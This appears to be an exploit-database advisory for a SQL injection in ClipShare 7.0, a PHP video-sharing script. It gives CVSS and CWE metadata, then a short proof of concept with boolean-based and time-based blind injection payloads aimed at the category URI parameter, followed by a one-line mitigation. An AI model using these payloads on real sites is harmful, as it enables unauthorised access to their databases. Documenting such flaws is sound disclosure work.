vendor:
ClipShare
by:
8bitsec
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: ClipShare
Affected Version From: 7.0
Affected Version To: 7.0
Patch Exists: YES
Related CWE: N/A
CPE: a:clip-share:clipshare:7.0
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Kali Linux 2.0, Mac OS 10.12.6
2017
ClipShare v7.0 – SQL Injection
ClipShare is the first and most popular PHP video script for building highly-profitable video sharing websites. SQL injection on [category] URI parameter. Proof of Concept (PoC): SQLi: https://localhost/[path]/videos/[category]' AND 5593=5593 AND 'LJPS'='LJPS Parameter: #1* (URI) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: https://localhost/[path]/videos/[category]' AND 5593=5593 AND 'LJPS'='LJPS Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: https://localhost/[path]/videos/[category]' AND SLEEP(5) AND 'xNCN'='xNCN
Mitigation:
Input validation and sanitization should be done to prevent SQL injection attacks.